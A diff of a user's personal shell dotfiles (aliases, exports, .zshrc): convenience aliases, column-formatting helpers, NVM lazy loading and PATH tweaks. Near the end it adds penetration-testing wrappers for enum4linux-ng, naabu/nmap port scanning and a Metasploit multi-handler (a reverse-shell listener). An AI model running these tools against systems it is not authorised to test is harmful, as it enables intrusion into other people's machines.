# ~/dotfiles/aliases.sh
|
||||
|
||||
# ---- PAI Commands -----
|
||||
alias cmd='bun ~/.claude/commands/cmd.ts'
|
||||
alias cmd='bun ~/.claude/commands/cmd.md'
|
||||
alias freq='~/.claude/skills/frequency-therapy/tools/freq'
|
||||
|
||||
# ---- Fabric -----
|
||||
|
||||
|
|
@ -21,14 +22,27 @@ yt() {
|
|||
fabric -y "$video_link" $transcript_flag
|
||||
}
|
||||
|
||||
for pattern_file in "$HOME"/.config/fabric/patterns/*; do
|
||||
# Get the base name of the file (i.e., remove the directory path)
|
||||
pattern_name=$(basename "$pattern_file")
|
||||
# Create an alias in the form: alias pattern_name="fabric --pattern pattern_name"
|
||||
alias_command="alias $pattern_name='fabric --pattern $pattern_name'"
|
||||
# Evaluate the alias command to add it to the current shell
|
||||
eval "$alias_command"
|
||||
done
|
||||
# Fabric pattern aliases removed - now using lazy loading in ~/.zshenv
|
||||
# (command_not_found_handler automatically detects fabric patterns)
|
||||
|
||||
# ----------------------------
|
||||
# Sudo Wrapper with PATH Preservation
|
||||
# ----------------------------
|
||||
|
||||
# Preserve PATH when using sudo with user-installed tools
|
||||
# Usage: S uv pip install something --system (capital S)
|
||||
alias S='sudo env PATH="$PATH"'
|
||||
|
||||
# ----------------------------
|
||||
# Python Package Managers Quick Reference
|
||||
# ----------------------------
|
||||
# pip/pip3/uv → Venv-focused (use for projects)
|
||||
# pipx → CLI tools (use for global tools like yt-dlp, black, ruff)
|
||||
# S uv → System install with PATH preserved (only when pipx won't work)
|
||||
|
||||
# Pipx management aliases
|
||||
alias U='pipx upgrade-all' # Update all pipx packages
|
||||
alias P='pipx list' # List pipx packages
|
||||
|
||||
# --- OpenCode ---
|
||||
|
||||
|
|
@ -94,6 +108,9 @@ fi
|
|||
alias a='~/arsenal/run -t'
|
||||
alias any='~/AnythingLLMDesktop/start'
|
||||
alias c='clear'
|
||||
alias ..='cd ..'
|
||||
alias ...='cd ../..'
|
||||
alias ....='cd ../../..'
|
||||
cpy() {
|
||||
cat "$1" | pbcopy
|
||||
}
|
||||
|
|
@ -106,24 +123,29 @@ alias f='fabric'
|
|||
#}
|
||||
alias i='sudo apt install'
|
||||
alias j='journalctl -f'
|
||||
alias jj='pbpaste | jsonpp | pbcopy'
|
||||
alias jjj='pbpaste | jsonpp'
|
||||
# Note: jj is now a script in ~/scripts/ (upgraded from alias)
|
||||
# For quick clipboard pretty-print, still use: pbpaste | jq . | pbcopy
|
||||
alias jjj='pbpaste | jq .' # Quick view (no copy back)
|
||||
alias k='kill $(ps aux | fzf | awk '\''{print $2}'\'')'
|
||||
# alias k9='kill -9 **'
|
||||
alias nano='hx'
|
||||
alias nf='fzf -m --preview="bat --color=always --style=numbers --line-range:300 {}" --bind "enter:become(hx {+})"'
|
||||
alias oc='opencode'
|
||||
alias p='parallel'
|
||||
|
||||
alias rec='parecord --device=alsa_output.pci-0000_00_1f.3.analog-stereo.monitor \
|
||||
alias rec='meeting-record' # Override for transcription
|
||||
alias rec-audio='parecord --device=alsa_output.pci-0000_00_1f.3.analog-stereo.monitor \
|
||||
--file-format=wav ~/recordings/meeting-$(date +%Y%m%d-%H%M%S).wav'
|
||||
alias rm='rm -I'
|
||||
|
||||
if [[ -n "$ZSH_VERSION" ]]; then
|
||||
alias s='source ~/.zshrc; source ~/.aliases'
|
||||
alias s='source ~/.zshrc' # zshrc already sources ~/.aliases and ~/.exports
|
||||
elif [[ -n "$BASH_VERSION" ]]; then
|
||||
alias s='source ~/.bashrc; source ~/.aliases'
|
||||
alias s='source ~/.bashrc' # bashrc already sources ~/.aliases
|
||||
fi
|
||||
|
||||
alias sa='source ~/.aliases'
|
||||
|
||||
alias ta='tmux attach -t'
|
||||
alias trim="awk '{\$1=\$1;print}'"
|
||||
alias up='sudo apt update && sudo apt upgrade -y'
|
||||
|
|
@ -161,7 +183,7 @@ unalias dl 2>/dev/null
|
|||
batclip() {
|
||||
bat "$1" | xclip
|
||||
}
|
||||
alias du='dust'
|
||||
# alias du='dust'
|
||||
alias dfh='gdu -dn'
|
||||
dl() {
|
||||
yt-dlp -f best "$1"
|
||||
|
|
@ -226,11 +248,8 @@ alias tb='task burndown.daily'
|
|||
# Miscellaneous
|
||||
# ----------------------------
|
||||
|
||||
note() {
|
||||
echo "date: $(date)" >> "$HOME"/drafts.txt
|
||||
echo "$@" >> "$HOME"/drafts.txt
|
||||
echo "" >> "$HOME"/drafts.txt
|
||||
}
|
||||
# Note: note() is now a script in ~/scripts/ (upgraded from function)
|
||||
# Old notes are still in ~/drafts.txt if you need them
|
||||
|
||||
help() {
|
||||
if builtin help "$1" &>/dev/null; then
|
||||
|
|
@ -272,6 +291,7 @@ fi
|
|||
# fi
|
||||
|
||||
alias l='eza -lah --icons'
|
||||
alias sl='eza'
|
||||
|
||||
if command -v exa &> /dev/null; then
|
||||
alias ls='exa'
|
||||
|
|
@ -283,6 +303,10 @@ fi
|
|||
|
||||
if command -v eza &> /dev/null; then
|
||||
alias lg='eza -lah --icons --git -a'
|
||||
# Newest files first (like ls -ltr but reversed to show newest at bottom)
|
||||
alias ltr='eza --color=always -lrsnew'
|
||||
alias snew='eza --color=always -lrsnew | head -20' # Newest 20 files
|
||||
alias lnew='eza --color=always -lsnew | tail -20' # Newest 20 at bottom
|
||||
fi
|
||||
|
||||
# Fallbacks if neither exa nor eza are found
|
||||
|
|
@ -319,7 +343,7 @@ alias serve='python3 -m http.server 80'
|
|||
# --------------------------------------
|
||||
|
||||
alias xh='xh --style auto'
|
||||
alias myip='curl ifconfig.me'
|
||||
# Note: myip is now a script in ~/scripts/ (upgraded from alias)
|
||||
alias localip="ip a | grep inet"
|
||||
|
||||
if command -v mtr &> /dev/null; then
|
||||
|
|
@ -330,7 +354,7 @@ fi
|
|||
|
||||
alias net='bandwhich'
|
||||
alias sniff='sudo tcpdump -i any -n'
|
||||
alias ports='ss -tuln'
|
||||
# Note: ports is now a script in ~/scripts/ (upgraded from alias)
|
||||
alias psnet='sudo netstat -tulnp'
|
||||
alias fire='sudo ufw status verbose'
|
||||
alias logs='sudo tail -f /var/log/syslog'
|
||||
|
|
@ -398,3 +422,260 @@ baserow_api() {
|
|||
"http://baserow:3000/api/${endpoint}" \
|
||||
"$@"
|
||||
}
|
||||
alias docker-compose="docker compose"
|
||||
|
||||
# ----------------------------
|
||||
# Manual Redshift Control (Nuclear Option - 2025-10-16)
|
||||
# ----------------------------
|
||||
alias night='redshift -O 2600 -P && echo "🌙 Night mode activated (2600K)"'
|
||||
alias day='redshift -x && echo "☀️ Day mode activated (reset to default)"'
|
||||
alias evening='redshift -O 3500 -P && echo "🌅 Evening mode activated (3500K)"'
|
||||
|
||||
# WhisperTux quick launch aliases
|
||||
alias wt='systemctl --user start whispertux'
|
||||
alias wt-stop='systemctl --user stop whispertux'
|
||||
alias wt-status='systemctl --user status whispertux'
|
||||
alias wt-log='journalctl --user -u whispertux -f'
|
||||
alias reload='source ~/.zshrc && echo "✅ Shell reloaded - WhisperTux aliases active"'
|
||||
|
||||
# ----------------------------
|
||||
# Evan Hahn Inspired Utilities (Tier 1)
|
||||
# ----------------------------
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
|
||||
# Copy current directory to clipboard (strips trailing newline)
|
||||
cpwd() {
|
||||
pwd | tr -d '\n' | pbcopy
|
||||
}
|
||||
|
||||
# ISO date format for filename prefixes (2025-10-28)
|
||||
hoy() {
|
||||
echo -n "$(date '+%Y-%m-%d')"
|
||||
}
|
||||
|
||||
# Text case conversion
|
||||
alias uppered='tr "[:lower:]" "[:upper:]"'
|
||||
alias lowered='tr "[:upper:]" "[:lower:]"'
|
||||
|
||||
# Print specific line from stdin (usage: cat file | line 10)
|
||||
line() {
|
||||
sed -n "${1}p"
|
||||
}
|
||||
|
||||
# Jump to temporary directory
|
||||
tempe() {
|
||||
cd "$(mktemp -d)"
|
||||
}
|
||||
|
||||
# True background execution (suppress ALL output)
|
||||
bb() {
|
||||
nohup "$@" >/dev/null 2>&1 &
|
||||
}
|
||||
|
||||
# Note: running() is now a script in ~/scripts/ with PID highlighting
|
||||
|
||||
# Quick scratch buffer in editor (temp file)
|
||||
scratch() {
|
||||
"${EDITOR:-vim}" "$(mktemp)"
|
||||
}
|
||||
|
||||
# Note: tryna and trynafail are now scripts in ~/scripts/
|
||||
|
||||
# ----------------------------
|
||||
# Claude Code Hook Management
|
||||
# ----------------------------
|
||||
|
||||
# Fix Claude Code hooks when they stop firing
|
||||
# Touches all hook files to force file watcher reload
|
||||
# Usage: fix-hooks (then wait 60s before sending next message)
|
||||
alias fix-hooks='cd ~/.claude && touch settings.json hooks/*.ts && echo "✅ Hooks refreshed - wait 60-90 seconds before next message"'
|
||||
|
||||
# ----------------------------
|
||||
# Column Formatting Function Family
|
||||
# ----------------------------
|
||||
|
||||
# col - Column formatter with custom delimiter (supports files and stdin)
|
||||
# Usage: col <file> [delimiter]
|
||||
# cat file | col [delimiter]
|
||||
# Default delimiter is whitespace
|
||||
# Examples:
|
||||
# col file.txt # Default whitespace delimiter
|
||||
# col file.csv ',' # CSV with comma delimiter
|
||||
# col file.tsv $'\t' # TSV with tab delimiter
|
||||
# cat file.csv | col ',' # Piped input
|
||||
col() {
|
||||
local delim="${2:- }"
|
||||
|
||||
if [[ $# -eq 0 ]] || [[ "$1" == "-" ]]; then
|
||||
# Read from stdin
|
||||
column -t -s "$delim"
|
||||
else
|
||||
# Read from file
|
||||
local file="$1"
|
||||
if [[ ! -f "$file" ]]; then
|
||||
echo "Error: File '$file' not found" >&2
|
||||
return 1
|
||||
fi
|
||||
column -t -s "$delim" < "$file"
|
||||
fi
|
||||
}
|
||||
|
||||
# colp - Explicit piped version (alias for clarity)
|
||||
# Usage: cat file.csv | colp ','
|
||||
colp() {
|
||||
local delim="${1:- }"
|
||||
column -t -s "$delim"
|
||||
}
|
||||
|
||||
colah() { cola "$1" | sed '1s/^/\x1b[1;36m/; 1s/$/\x1b[0m/'; }
|
||||
|
||||
# cola - Auto-detect delimiter (CSV/TSV/space)
|
||||
# Usage: cola <file>
|
||||
# Automatically detects comma, tab, or space delimiters
|
||||
cola() {
|
||||
if [[ $# -eq 0 ]]; then
|
||||
echo "Usage: cola <file>" >&2
|
||||
return 1
|
||||
fi
|
||||
|
||||
local file="$1"
|
||||
if [[ ! -f "$file" ]]; then
|
||||
echo "Error: File '$file' not found" >&2
|
||||
return 1
|
||||
fi
|
||||
|
||||
# Detect delimiter by sampling first line
|
||||
local first_line=$(head -n1 "$file")
|
||||
local delim
|
||||
|
||||
if [[ "$first_line" =~ $'\t' ]]; then
|
||||
delim=$'\t'
|
||||
echo "# Auto-detected: TSV (tab-delimited)" >&2
|
||||
elif [[ "$first_line" =~ , ]]; then
|
||||
delim=','
|
||||
echo "# Auto-detected: CSV (comma-delimited)" >&2
|
||||
else
|
||||
delim=' '
|
||||
echo "# Auto-detected: Space-delimited" >&2
|
||||
fi
|
||||
|
||||
column -t -s "$delim" < "$file"
|
||||
}
|
||||
|
||||
# colh - Column formatter with highlighted header row
|
||||
# Usage: colh <file> [delimiter]
|
||||
# First row is displayed in bold cyan
|
||||
colh() {
|
||||
if [[ $# -eq 0 ]]; then
|
||||
echo "Usage: colh <file> [delimiter]" >&2
|
||||
return 1
|
||||
fi
|
||||
|
||||
local file="$1"
|
||||
local delim="${2:- }"
|
||||
|
||||
if [[ ! -f "$file" ]]; then
|
||||
echo "Error: File '$file' not found" >&2
|
||||
return 1
|
||||
fi
|
||||
|
||||
{
|
||||
# Header in bold cyan
|
||||
head -n1 "$file" | column -t -s "$delim" | sed 's/^/\x1b[1;36m/' | sed 's/$/\x1b[0m/'
|
||||
# Rest of file normal
|
||||
tail -n+2 "$file" | column -t -s "$delim"
|
||||
}
|
||||
}
|
||||
|
||||
# coln - Column formatter with numbered rows
|
||||
# Usage: coln <file> [delimiter]
|
||||
# Adds line numbers like cat -n
|
||||
coln() {
|
||||
if [[ $# -eq 0 ]]; then
|
||||
echo "Usage: coln <file> [delimiter]" >&2
|
||||
return 1
|
||||
fi
|
||||
|
||||
local file="$1"
|
||||
local delim="${2:- }"
|
||||
|
||||
if [[ ! -f "$file" ]]; then
|
||||
echo "Error: File '$file' not found" >&2
|
||||
return 1
|
||||
fi
|
||||
|
||||
column -t -s "$delim" < "$file" | nl -w3 -s' '
|
||||
}
|
||||
|
||||
# Bonus: CSV/TSV converters
|
||||
csv2tsv() {
|
||||
if [[ $# -eq 0 ]]; then
|
||||
echo "Usage: csv2tsv <file>" >&2
|
||||
return 1
|
||||
fi
|
||||
sed 's/,/\t/g' "$1"
|
||||
}
|
||||
|
||||
tsv2csv() {
|
||||
if [[ $# -eq 0 ]]; then
|
||||
echo "Usage: tsv2csv <file>" >&2
|
||||
return 1
|
||||
fi
|
||||
sed 's/\t/,/g' "$1"
|
||||
}
|
||||
|
||||
# colj - Convert CSV to JSON array (first row = keys)
|
||||
colj() {
|
||||
local input
|
||||
if [[ $# -eq 0 ]] || [[ "$1" == "-" ]]; then
|
||||
input=$(cat)
|
||||
else
|
||||
[[ -f "$1" ]] || { echo "Error: File '$1' not found" >&2; return 1; }
|
||||
input=$(cat "$1")
|
||||
fi
|
||||
|
||||
# Use Python for reliable CSV parsing (handles quoted fields with commas)
|
||||
echo "$input" | python3 -c '
|
||||
import csv, json, sys
|
||||
reader = csv.DictReader(sys.stdin)
|
||||
print(json.dumps([row for row in reader], indent=2))
|
||||
'
|
||||
}
|
||||
|
||||
# ----------------------------
|
||||
# Reconnaissance & Pentesting Aliases
|
||||
# ----------------------------
|
||||
|
||||
# Note: recon, web-recon, and wes are now scripts in ~/scripts/pentesting/
|
||||
# Access them directly: recon, web-recon, wes
|
||||
|
||||
# Web reconnaissance alias (alternative name)
|
||||
discover() {
|
||||
web-recon "$1"
|
||||
}
|
||||
|
||||
# enum4linux-ng docker wrapper
|
||||
e4l() {
|
||||
docker run --rm -t enum4linux-ng -A -C "$1"
|
||||
}
|
||||
|
||||
# Naabu + nmap combo (uses pscan if available)
|
||||
gomap() {
|
||||
if command -v pscan &>/dev/null; then
|
||||
pscan "$1" -v
|
||||
elif command -v naabu &>/dev/null; then
|
||||
naabu -host "$1" -nmap-cli "nmap $2"
|
||||
else
|
||||
echo "Install naabu or use pscan script"
|
||||
fi
|
||||
}
|
||||
|
||||
# Metasploit multi-handler
|
||||
msfl() {
|
||||
if [ ! -f "$HOME/scripts/multi_handler.rc" ]; then
|
||||
echo -e "\033[0;33m⚠\033[0m multi_handler.rc not found"
|
||||
echo "Create it at: ~/scripts/multi_handler.rc"
|
||||
return 1
|
||||
fi
|
||||
msfconsole -r "$HOME/scripts/multi_handler.rc"
|
||||
}
|
||||
|
|
|
|||
|
|
@ -4,6 +4,7 @@ export PAGER="${PAGER:-most}"
|
|||
|
||||
# PAI3 Personal AI Infrastructure
|
||||
export PAI_HOME="/home/e"
|
||||
export PAI_DIR="$HOME/.claude" # Added for PAI v0.6.0 compatibility
|
||||
export PATH=$PATH:"$HOME/.claude"
|
||||
export PATH=$PATH:"$HOME/.claude/commands"
|
||||
# export MANPAGER="sh -c 'sed -u -e \"s/\\x1B\[[0-9;]*m//g; s/.\\x08//g\" | bat -p -lman'"\nman 2 select
|
||||
|
|
@ -13,6 +14,7 @@ export LC_ALL=en_US.UTF-8
|
|||
export GOROOT="/usr/local/go"
|
||||
export GOPATH="$HOME/go"
|
||||
export PATH=$PATH:$GOROOT/bin
|
||||
export PATH=$PATH:$HOME/.bun/bin
|
||||
# export STOW_DIR="$HOME/.config"
|
||||
|
||||
# --- fzf ---
|
||||
|
|
@ -41,7 +43,7 @@ export FZF_CTRL_R_OPTS="
|
|||
|
||||
# Path
|
||||
export PATH="$PATH:$HOME/go/bin"
|
||||
export PATH="$PATH:$HOME/.scripts"
|
||||
export PATH="$PATH:$HOME/.scripts:$HOME/scripts"
|
||||
export PATH="$PATH:$HOME/.cargo/bin"
|
||||
export PATH="$PATH:$GOPATH/bin:$GOROOT/bin"
|
||||
export PATH="$PATH:/usr/local/go/bin"
|
||||
|
|
@ -59,3 +61,4 @@ if command -v bat &> /dev/null; then
|
|||
# export MANPAGER="sh -c 'col -bx | bat -l man -p'"
|
||||
export MANPAGER="sh -c 'sed -u -e \"s/\\x1B\[[0-9;]*m//g; s/.\\x08//g\" | bat -p -lman'"
|
||||
fi
|
||||
# Removed redundant PATH addition (already on line 50)
|
||||
|
|
|
|||
83
zsh/.zshrc
83
zsh/.zshrc
|
|
@ -1,3 +1,14 @@
|
|||
# Guard against re-sourcing (prevents slowdown on multiple sources)
|
||||
# But allow aliases and exports to be reloaded when manually sourced
|
||||
if [[ -n "$ZSHRC_LOADED" ]]; then
|
||||
# If manually sourcing (not initial shell startup), just reload configs
|
||||
[ -f ~/.aliases ] && source ~/.aliases
|
||||
[ -f ~/.exports ] && source ~/.exports
|
||||
return 0
|
||||
fi
|
||||
# Don't export - each shell instance should load fresh
|
||||
ZSHRC_LOADED=1
|
||||
|
||||
# Enable Powerlevel10k instant prompt. Should stay close to the top of ~/.zshrc.
|
||||
# Initialization code that may require console input (password prompts, [y/n]
|
||||
# confirmations, etc.) must go above this block; everything else may go below.
|
||||
|
|
@ -123,9 +134,60 @@ source $HOME/.cargo/env
|
|||
# <<< conda initialize <<<
|
||||
|
||||
|
||||
# NVM Lazy Loading (saves ~400ms on shell startup)
|
||||
# Instead of loading NVM immediately, we create placeholder functions
|
||||
# that load NVM only when first used
|
||||
export NVM_DIR="$HOME/.nvm"
|
||||
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
|
||||
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion
|
||||
|
||||
# Add NVM's default Node to PATH manually (fast)
|
||||
if [ -d "$NVM_DIR/versions/node" ]; then
|
||||
# Get the default/current Node version
|
||||
NVM_DEFAULT_NODE=$(find "$NVM_DIR/versions/node" -maxdepth 1 -type d | sort -V | tail -1)
|
||||
if [ -n "$NVM_DEFAULT_NODE" ]; then
|
||||
export PATH="$NVM_DEFAULT_NODE/bin:$PATH"
|
||||
fi
|
||||
fi
|
||||
|
||||
# Lazy load function - loads NVM on first use
|
||||
lazy_load_nvm() {
|
||||
unset -f nvm node npm npx
|
||||
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"
|
||||
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion"
|
||||
}
|
||||
|
||||
# Create placeholder functions that trigger lazy loading
|
||||
nvm() {
|
||||
lazy_load_nvm
|
||||
nvm "$@"
|
||||
}
|
||||
|
||||
node() {
|
||||
# If node is in PATH (from our manual add above), use it directly
|
||||
if command -v node >/dev/null 2>&1; then
|
||||
command node "$@"
|
||||
else
|
||||
lazy_load_nvm
|
||||
node "$@"
|
||||
fi
|
||||
}
|
||||
|
||||
npm() {
|
||||
if command -v npm >/dev/null 2>&1; then
|
||||
command npm "$@"
|
||||
else
|
||||
lazy_load_nvm
|
||||
npm "$@"
|
||||
fi
|
||||
}
|
||||
|
||||
npx() {
|
||||
if command -v npx >/dev/null 2>&1; then
|
||||
command npx "$@"
|
||||
else
|
||||
lazy_load_nvm
|
||||
npx "$@"
|
||||
fi
|
||||
}
|
||||
|
||||
|
||||
# Generated for pdtm. Do not edit.
|
||||
|
|
@ -141,3 +203,20 @@ export PATH=/home/e/.opencode/bin:$PATH
|
|||
# bun
|
||||
export BUN_INSTALL="$HOME/.bun"
|
||||
export PATH="$BUN_INSTALL/bin:$PATH"
|
||||
# Removed redundant .local/bin addition (already in ~/.exports)
|
||||
|
||||
# SSH Agent for persistent tunnel (Baserow, etc.)
|
||||
export SSH_AUTH_SOCK=/run/user/1000/ssh-agent.socket
|
||||
|
||||
# Reminder to add SSH key after reboot
|
||||
if ! ssh-add -l &>/dev/null; then
|
||||
echo "🔑 Reminder: Add your Vultr SSH key for blog automation:"
|
||||
echo " ssh-add ~/.ssh/id_ed25519_vultr"
|
||||
fi
|
||||
|
||||
# Deduplicate PATH at the end (after all PATH modifications)
|
||||
export PATH=$(echo "$PATH" | tr ':' '\n' | awk '!seen[$0]++' | paste -sd:)
|
||||
|
||||
# Make PATH available to GUI applications (Ulauncher, etc.)
|
||||
# This ensures apps launched outside terminal sessions can find bun, custom bins, etc.
|
||||
systemctl --user import-environment PATH
|
||||
|
|
|
|||
Loading…
Add table
Reference in a new issue